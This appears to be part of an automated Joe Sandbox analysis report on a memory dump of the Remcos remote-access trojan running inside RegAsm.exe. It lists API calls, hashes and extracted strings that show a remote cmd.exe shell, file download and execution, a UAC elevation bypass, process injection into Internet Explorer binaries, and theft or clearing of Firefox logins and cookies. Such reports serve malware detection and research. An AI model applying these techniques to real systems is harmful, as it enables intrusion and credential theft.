                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Deallocatestd::_
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1323251999-0
                                                                                                                            • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                                                            • Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
                                                                                                                            • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                                                            • Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: send
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2809346765-0
                                                                                                                            • Opcode ID: a64cf630b3b4fcbf92e6cf8d3c010959396a6b24f5439efeece66edae75e3506
                                                                                                                            • Instruction ID: 80dceff54fd7c7607e374e8a405dba3f032bb15cdc3f4a53630576a73fa931ff
                                                                                                                            • Opcode Fuzzy Hash: a64cf630b3b4fcbf92e6cf8d3c010959396a6b24f5439efeece66edae75e3506
                                                                                                                            • Instruction Fuzzy Hash: 79B09279108202FFCB150B60CD0887A7EAAABC8381F008A2CB187411B1C636C852AB26
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: recv
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1507349165-0
                                                                                                                            • Opcode ID: 12f17b9eb2b05ccee17ecde8d051cd75af37e2c2e0a2002d53484fbbe037e517
                                                                                                                            • Instruction ID: 54da5cb0358175ea3eef87e0ba5f02fe09cc36e19498aa822303b7a5c5cf0de8
                                                                                                                            • Opcode Fuzzy Hash: 12f17b9eb2b05ccee17ecde8d051cd75af37e2c2e0a2002d53484fbbe037e517
                                                                                                                            • Instruction Fuzzy Hash: 38B09B75108302FFC6150750CC0486A7D66DBC8351B00481C714641170C736C8519725
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                                                                            • Instruction ID: 079a7b638a28e99b338f4493b6ebfa8105bff269478f0661155a893ef6bf0f7e
                                                                                                                            • Opcode Fuzzy Hash: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                                                                            • Instruction Fuzzy Hash: 13B00872418382EBCF02DF90DD0492ABAB2BB88741F184C5CB2A14107187228428EB06
                                                                                                                            APIs
                                                                                                                            • SetEvent.KERNEL32(?,?), ref: 00407CB9
                                                                                                                            • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                                                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                                                                                                                              • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                                                                                                              • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                                                                                                              • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                                                                                                              • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                                                                                                                              • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                                                                                                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                              • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                                                              • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                                                              • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                                                                                                                            • GetLogicalDriveStringsA.KERNEL32 ref: 00408278
                                                                                                                            • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00408652
                                                                                                                              • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                                                                                                                              • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                                                                                                              • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                                                                                                              • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                                                                                                            • Sleep.KERNEL32(000007D0), ref: 004086F8
                                                                                                                            • StrToIntA.SHLWAPI(00000000), ref: 0040873A
                                                                                                                              • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                                                                            • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                                                                                            • API String ID: 1067849700-181434739
                                                                                                                            • Opcode ID: 396e27ebfce766624114f227e28b318e330db08450ae1e804d47f59ac45cbb4d
                                                                                                                            • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                                                                                                                            • Opcode Fuzzy Hash: 396e27ebfce766624114f227e28b318e330db08450ae1e804d47f59ac45cbb4d
                                                                                                                            • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                                                                                                                            APIs
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                                                                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 00405723
                                                                                                                            • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                                                                                                                            • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                                                                                            • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                                                                                            • PeekNamedPipe.KERNEL32 ref: 004058BC
                                                                                                                            • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                                                                              • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                                                                                                                            • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                                                                                            • CloseHandle.KERNEL32 ref: 00405A23
                                                                                                                            • CloseHandle.KERNEL32 ref: 00405A2B
                                                                                                                            • CloseHandle.KERNEL32 ref: 00405A3D
                                                                                                                            • CloseHandle.KERNEL32 ref: 00405A45
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                                            • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                                                                                            • API String ID: 2994406822-18413064
                                                                                                                            • Opcode ID: 7fb8308a740996224f11134c07f871dd0bed34704b5cf7dc3315aa4e63d598f6
                                                                                                                            • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                                                                                                                            • Opcode Fuzzy Hash: 7fb8308a740996224f11134c07f871dd0bed34704b5cf7dc3315aa4e63d598f6
                                                                                                                            • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00412106
                                                                                                                              • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                                                                                              • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                                                                                                                              • Part of subcall function 00413877: RegCloseKey.KERNEL32(004660A4), ref: 004138AB
                                                                                                                            • OpenMutexA.KERNEL32 ref: 00412146
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00412155
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                                                            • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                                                                                            • API String ID: 3018269243-13974260
                                                                                                                            • Opcode ID: 2d0f795493d6dd0f1c0ae32495555cdb290ac7a8c9bea9647889ea0ebcc72388
                                                                                                                            • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                                                                                                                            • Opcode Fuzzy Hash: 2d0f795493d6dd0f1c0ae32495555cdb290ac7a8c9bea9647889ea0ebcc72388
                                                                                                                            • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                                                                                                                            APIs
                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040BBC9
                                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040BD12
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$CloseFile$FirstNext
                                                                                                                            • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                                            • API String ID: 1164774033-3681987949
                                                                                                                            • Opcode ID: 8d7aaefdbbb17da70651c85bfc14742a28090f78922c13758640ed364e1dedc2
                                                                                                                            • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                                                                                                                            • Opcode Fuzzy Hash: 8d7aaefdbbb17da70651c85bfc14742a28090f78922c13758640ed364e1dedc2
                                                                                                                            • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                                                                                                                            APIs
                                                                                                                            • OpenClipboard.USER32 ref: 004168C2
                                                                                                                            • EmptyClipboard.USER32 ref: 004168D0
                                                                                                                            • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004168F9
                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
                                                                                                                            • CloseClipboard.USER32 ref: 00416955
                                                                                                                            • OpenClipboard.USER32 ref: 0041695C
                                                                                                                            • GetClipboardData.USER32 ref: 0041696C
                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00416975
                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                                                                                                            • CloseClipboard.USER32 ref: 00416984
                                                                                                                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                                            • String ID: !D@
                                                                                                                            • API String ID: 3520204547-604454484
                                                                                                                            • Opcode ID: 24192145d40dd5d885ebf24f35a4dad0bb1f4ab0e0a063593ed955df835b7d6e
                                                                                                                            • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                                                                                                                            • Opcode Fuzzy Hash: 24192145d40dd5d885ebf24f35a4dad0bb1f4ab0e0a063593ed955df835b7d6e
                                                                                                                            • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                                                                                                                            APIs
                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040BDC9
                                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040BEAF
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040BED0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$Close$File$FirstNext
                                                                                                                            • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                            • API String ID: 3527384056-432212279
                                                                                                                            • Opcode ID: 8f1e00925697bb1ed9065a8a50f8051e558b025f3b3c4185e977bc1ca5524bae
                                                                                                                            • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                                                                                                                            • Opcode Fuzzy Hash: 8f1e00925697bb1ed9065a8a50f8051e558b025f3b3c4185e977bc1ca5524bae
                                                                                                                            • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                                                                                                                            APIs
                                                                                                                            • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                                                                                                            • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                                                                                                            • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                                                                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00413465
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 297527592-0
                                                                                                                            • Opcode ID: cbaf96c0539d14e3bfc579cb390cbf1a6d01f92e477562203843d299bee7c5bd
                                                                                                                            • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                                                                                                                            • Opcode Fuzzy Hash: cbaf96c0539d14e3bfc579cb390cbf1a6d01f92e477562203843d299bee7c5bd
                                                                                                                            • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                                                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040F563
                                                                                                                              • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                                                                                              • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040F66E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                                                                            • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                                                                                            • API String ID: 3756808967-1743721670
                                                                                                                            • Opcode ID: 9696b3c9821f35113208a8e204aa4700f224166d16ac1652e85869771ea54990
                                                                                                                            • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                                                                                                                            • Opcode Fuzzy Hash: 9696b3c9821f35113208a8e204aa4700f224166d16ac1652e85869771ea54990
                                                                                                                            • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 0$1$2$3$4$5$6$7$VG
                                                                                                                            • API String ID: 0-1861860590
                                                                                                                            • Opcode ID: a0898ada7235e23996d16a558f3c20519f182ec80e29ad8a8220548995af58c0
                                                                                                                            • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                                                                                                                            • Opcode Fuzzy Hash: a0898ada7235e23996d16a558f3c20519f182ec80e29ad8a8220548995af58c0
                                                                                                                            • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                                                                                                                            APIs
                                                                                                                            • _wcslen.LIBCMT ref: 00407521
                                                                                                                            • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Object_wcslen
                                                                                                                            • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                            • API String ID: 240030777-3166923314
                                                                                                                            • Opcode ID: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                                                                                                            • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                                                                                                                            • Opcode Fuzzy Hash: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                                                                                                            • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                                                                                                                            APIs
                                                                                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                                                                                                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                                                                                                            • GetLastError.KERNEL32 ref: 0041A7BB
                                                                                                                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3587775597-0
                                                                                                                            • Opcode ID: 4d7e07cc6e00c0f0dc0cba18b78b11ddb9a145c181d83e8bc9a999359985f1ce
                                                                                                                            • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                                                                                                                            • Opcode Fuzzy Hash: 4d7e07cc6e00c0f0dc0cba18b78b11ddb9a145c181d83e8bc9a999359985f1ce
                                                                                                                            • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                                                                              • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                                                                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                                                                              • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                                                                              • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                                                                                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
